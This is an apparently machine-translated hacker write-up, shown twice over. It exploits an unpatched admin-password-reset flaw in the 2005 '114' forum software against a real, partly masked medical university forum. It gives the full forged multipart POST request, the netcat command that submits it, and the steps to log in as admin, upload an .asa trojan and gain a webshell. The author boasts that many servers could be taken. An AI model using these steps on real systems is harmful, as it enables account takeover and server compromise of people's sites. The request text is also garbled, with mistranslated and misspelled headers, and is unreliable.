114フォーラム2005公式版の脆弱性
キーワード:
著作権所有 デザイン制作:ウェブサイト114
脆弱性の説明:
ウェブサイト114 2005版公式サイト
//edituserdb.asp
提出データとcooickesに対して検証が足りません。
任意のユーザが管理者のパスワードを変更できます。
デフォルトのバックグラウンドadmin/index.asp
今日は機械室の機械を傍注する時に使いました。
http://www.**.net.cn/xzl/BBS/index.asp
*医科大学のウェブサイト上のフォーラム。
ユーザー33221を登録しました。
次にジャンプ /ediituserdb.aspで、「登録の変更」をクリックしてキャプチャーを開始します。
メモ帳でカバンを保存する内容は以下の通りです。
-----------------------------------------------------------
POST /xzl/BBS//SaveUser_Acceount.asp HTTP/1.1
Accept: イメージ/gif、 イメージ/x-xbitmap、 イメージ/jpeg、 イメージ/pjpeg、 appication/vnd.ms-excel、 appication/vnd.ms-powerpoint、 アプリ/msword、 appication/x-shocwave-flash、 */*
Referer: http://www.**.net.cn/xzl/BBS/edituserdb.asp
Acceept Language: zh-cn
コンテント-Type: multiipad/form-data; boundary=----------7 d 61 e 41 d 605 f 6
Acceept Ecoding: gzip、 deflate
User-Agent: Mozia/4.0 (comppatible MSIE 6.0; Windows NT 5.0; Maxthon)
Host: www.**.net.cn
Conteet Length: 2304
Connection: Keep-Alive
Cache-Coontrol: no-cache
Cookie: ASPSESSIOID SCTSQSAB=EKMKINHAIAACMGFMKABJDBME
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name="txtUserCode"
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtPassword」
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txt Confirm Password」
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtQuestion」
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtAnswer」
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtUserName」
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「selSex」
旦那様
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtNick」
11
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txt Province」
111
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txt Address」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtPostCode」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtTel」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtMobile」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtFax」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtEmail」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtUrl」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name="txtfile" filename="
コンテント-Type: appication/octet-stream
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtOicq」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txt Document」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「submit」
登録情報の変更
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name="txtId"
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtTempId」
------------------7 d 61 e 41 d 605 f 6--
--------------------------------------------------------
内訳:「
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name="txtUserCode"
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtPassword」
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txt Confirm Password」
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtQuestion」
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtAnswer」
33221
------------------7 d 61 e 41 d 605 f 6
」
最初の「33221」を修正して「admin」として11 txtテキストを保存します。
POST /xzl/BBS//SaveUser_Acceount.asp HTTP/1.1
Accept: イメージ/gif、 イメージ/x-xbitmap、 イメージ/jpeg、 イメージ/pjpeg、 appication/vnd.ms-excel、 appication/vnd.ms-powerpoint、 アプリ/msword、 appication/x-shocwave-flash、 */*
Referer: http://www.**.net.cn/xzl/BBS/edituserdb.asp
Acceept Language: zh-cn
コンテント-Type: multiipad/form-data; boundary=----------7 d 61 e 41 d 605 f 6
Acceept Ecoding: gzip、 deflate
User-Agent: Mozia/4.0 (comppatible MSIE 6.0; Windows NT 5.0; Maxthon)
Host: www.**.net.cn
Conteet Length: 2304
Connection: Keep-Alive
Cache-Coontrol: no-cache
Cookie: ASPSESSIOID SCTSQSAB=EKMKINHAIAACMGFMKABJDBME
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name="txtUserCode"
admin
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtPassword」
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txt Confirm Password」
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtQuestion」
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtAnswer」
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtUserName」
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「selSex」
旦那様
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtNick」
11
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txt Province」
111
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txt Address」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtPostCode」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtTel」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtMobile」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtFax」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtEmail」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtUrl」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name="txtfile" filename="
コンテント-Type: appication/octet-stream
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtOicq」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txt Document」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「submit」
登録情報の変更
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name="txtId"
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtTempId」
------------------7 d 61 e 41 d 605 f 6--
ここで登録したユーザー名33221とadminの長さは1つですので、ここでバイトの長さを変更する必要はありません。
その後、ncでサーバに提出します。
nc www.**.net.cn 80 <11.txt
会員資料の変更に成功したことを示すメッセージを返します。
そしてadminを使います パスワードは申請33221のパスワードです。
もちろん管理者権限です。そして、楽屋に登録して、「修正欄」をクリックして、asa木馬をアップロードして、ok、webshllをもらいます。
見ましたが、このフォーラムシステムはまだパッチが出ていませんので、webshellをたくさん持ってもいいです。でも、私にとって有用なサーバーがあれば、他のサーバーはつかんでいません。
著作権所有 デザイン制作:ウェブサイト114
脆弱性の説明:
ウェブサイト114 2005版公式サイト
//edituserdb.asp
提出データとcooickesに対して検証が足りません。
任意のユーザが管理者のパスワードを変更できます。
デフォルトのバックグラウンドadmin/index.asp
今日は機械室の機械を傍注する時に使いました。
http://www.**.net.cn/xzl/BBS/index.asp
*医科大学のウェブサイト上のフォーラム。
ユーザー33221を登録しました。
次にジャンプ /ediituserdb.aspで、「登録の変更」をクリックしてキャプチャーを開始します。
メモ帳でカバンを保存する内容は以下の通りです。
-----------------------------------------------------------
POST /xzl/BBS//SaveUser_Acceount.asp HTTP/1.1
Accept: イメージ/gif、 イメージ/x-xbitmap、 イメージ/jpeg、 イメージ/pjpeg、 appication/vnd.ms-excel、 appication/vnd.ms-powerpoint、 アプリ/msword、 appication/x-shocwave-flash、 */*
Referer: http://www.**.net.cn/xzl/BBS/edituserdb.asp
Acceept Language: zh-cn
コンテント-Type: multiipad/form-data; boundary=----------7 d 61 e 41 d 605 f 6
Acceept Ecoding: gzip、 deflate
User-Agent: Mozia/4.0 (comppatible MSIE 6.0; Windows NT 5.0; Maxthon)
Host: www.**.net.cn
Conteet Length: 2304
Connection: Keep-Alive
Cache-Coontrol: no-cache
Cookie: ASPSESSIOID SCTSQSAB=EKMKINHAIAACMGFMKABJDBME
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name="txtUserCode"
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtPassword」
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txt Confirm Password」
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtQuestion」
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtAnswer」
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtUserName」
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「selSex」
旦那様
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtNick」
11
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txt Province」
111
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txt Address」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtPostCode」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtTel」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtMobile」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtFax」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtEmail」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtUrl」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name="txtfile" filename="
コンテント-Type: appication/octet-stream
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtOicq」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txt Document」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「submit」
登録情報の変更
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name="txtId"
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtTempId」
------------------7 d 61 e 41 d 605 f 6--
--------------------------------------------------------
内訳:「
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name="txtUserCode"
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtPassword」
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txt Confirm Password」
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtQuestion」
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtAnswer」
33221
------------------7 d 61 e 41 d 605 f 6
」
最初の「33221」を修正して「admin」として11 txtテキストを保存します。
POST /xzl/BBS//SaveUser_Acceount.asp HTTP/1.1
Accept: イメージ/gif、 イメージ/x-xbitmap、 イメージ/jpeg、 イメージ/pjpeg、 appication/vnd.ms-excel、 appication/vnd.ms-powerpoint、 アプリ/msword、 appication/x-shocwave-flash、 */*
Referer: http://www.**.net.cn/xzl/BBS/edituserdb.asp
Acceept Language: zh-cn
コンテント-Type: multiipad/form-data; boundary=----------7 d 61 e 41 d 605 f 6
Acceept Ecoding: gzip、 deflate
User-Agent: Mozia/4.0 (comppatible MSIE 6.0; Windows NT 5.0; Maxthon)
Host: www.**.net.cn
Conteet Length: 2304
Connection: Keep-Alive
Cache-Coontrol: no-cache
Cookie: ASPSESSIOID SCTSQSAB=EKMKINHAIAACMGFMKABJDBME
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name="txtUserCode"
admin
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtPassword」
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txt Confirm Password」
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtQuestion」
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtAnswer」
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtUserName」
33221
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「selSex」
旦那様
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtNick」
11
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txt Province」
111
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txt Address」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtPostCode」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtTel」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtMobile」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtFax」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtEmail」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtUrl」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name="txtfile" filename="
コンテント-Type: appication/octet-stream
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtOicq」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txt Document」
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「submit」
登録情報の変更
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name="txtId"
------------------7 d 61 e 41 d 605 f 6
Conttentt Dispopsition: form-data name=「txtTempId」
------------------7 d 61 e 41 d 605 f 6--
ここで登録したユーザー名33221とadminの長さは1つですので、ここでバイトの長さを変更する必要はありません。
その後、ncでサーバに提出します。
nc www.**.net.cn 80 <11.txt
会員資料の変更に成功したことを示すメッセージを返します。
そしてadminを使います パスワードは申請33221のパスワードです。
もちろん管理者権限です。そして、楽屋に登録して、「修正欄」をクリックして、asa木馬をアップロードして、ok、webshllをもらいます。
見ましたが、このフォーラムシステムはまだパッチが出ていませんので、webshellをたくさん持ってもいいです。でも、私にとって有用なサーバーがあれば、他のサーバーはつかんでいません。